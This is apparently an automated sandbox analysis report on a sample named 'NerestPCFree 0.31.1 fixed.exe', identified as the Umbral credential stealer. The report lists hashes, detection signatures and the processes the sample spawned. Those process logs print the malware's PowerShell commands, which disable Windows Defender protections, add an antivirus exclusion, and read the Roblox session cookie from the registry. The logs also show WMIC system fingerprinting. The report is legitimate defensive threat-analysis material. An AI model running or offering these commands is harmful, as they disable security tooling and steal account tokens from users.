Overview

overview

10

Static

static

10

NerestPCFr...ed.exe

windows10-2004-x64

10

NerestPCFr...ed.exe

windows7-x64

10

NerestPCFr...ed.exe

windows10-2004-x64

10

NerestPCFr...ed.exe

windows10-ltsc 2021-x64

10

NerestPCFr...ed.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    7s
  • max time network
    8s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    11-12-2024 21:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NerestPCFree 0.31.1 fixed.exe

  • Size

    231KB

  • MD5

    08dce587975cb4a6cb1333bd7d3aea6c

  • SHA1

    4c855f6bb5cad027522d0a063cb4f1cd6e97b163

  • SHA256

    0c6e6a1c2c50a0a1ab3f74ea0985e14003921c3b7f4e427b56c7673439accb8b

  • SHA512

    19f21d6f976a971f4bffbf74a7b6450ec6b6ec02d837422a5c5edbd3fb825e630642e4b840e181484a2e0e47997631ad7012f1f710aa098538164c8998592f81

  • SSDEEP

    6144:xloZMCrIkd8g+EtXHkv/iD4LsUtt74szYKrd4UBr8b8e1mOoi:DoZZL+EP8LsUtt74szYKrd4UBAJ

Score
10/10
umbralexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NerestPCFree 0.31.1 fixed.exe
    "C:\Users\Admin\AppData\Local\Temp\NerestPCFree 0.31.1 fixed.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3652
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NerestPCFree 0.31.1 fixed.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5864
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3308
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5692
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1792
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3772
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:5140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:4688
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious behavior: EnumeratesProcesses
      PID:5064

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    948B

    MD5

    8a5d9a484bd4e85a222d5b14a4c11f39

    SHA1

    4618695eeeca3b0d17d5c1fd4bd9087266357b0b

    SHA256

    6dac33e2751171c49cc0901b7cc70aa052da97095e129589c905c531554c36ff

    SHA512

    c98b6b74617da08577ed385f162bde9115e1ab90ce4f69c5907a5e6eb70e26451d0d6c6f7f43c3e7ec28630708730232fdadbdf6836649385747c2ec01f55fb1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    8e1fdd1b66d2fee9f6a052524d4ddca5

    SHA1

    0a9d0994559d1be2eecd8b0d6960540ca627bdb6

    SHA256

    4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

    SHA512

    5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    be32ce7096b7fba3ffa26237507c0493

    SHA1

    b93ef0272fd75e3a1eee1b5e8ab1b8f1bb2452a9

    SHA256

    02924c8c15788bf3e8016fb3cde2f56cd9142dec75c0773dd3b844895facdb76

    SHA512

    b75746cdcae4dac1d333e1797d3878e68414e44613f4233b7b05c58cd2a926fb6d18a562b9f434330a9c1764f0a0489a88f387dd4eca62013ca3f8a677991f04

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fdbfc2wb.zuy.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3652-58-0x000001D4A1270000-0x000001D4A127A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3652-0-0x00007FF9A6FE3000-0x00007FF9A6FE5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3652-80-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3652-79-0x000001D4A13A0000-0x000001D4A1547000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/3652-75-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3652-74-0x00007FF9A6FE3000-0x00007FF9A6FE5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3652-1-0x000001D486B90000-0x000001D486BD0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/3652-59-0x000001D4A1550000-0x000001D4A1562000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3652-32-0x000001D4A12D0000-0x000001D4A1346000-memory.dmp

    Filesize

    472KB

    Download

  • memory/3652-33-0x000001D4A1350000-0x000001D4A13A0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3652-34-0x000001D488A50000-0x000001D488A6E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3652-2-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5864-12-0x0000028078600000-0x0000028078622000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5864-14-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5864-13-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5864-20-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5864-19-0x00000280787C0000-0x00000280789DD000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/5864-17-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5864-16-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5864-15-0x00007FF9A6FE0000-0x00007FF9A7AA2000-memory.dmp

    Filesize

    10.8MB

    Download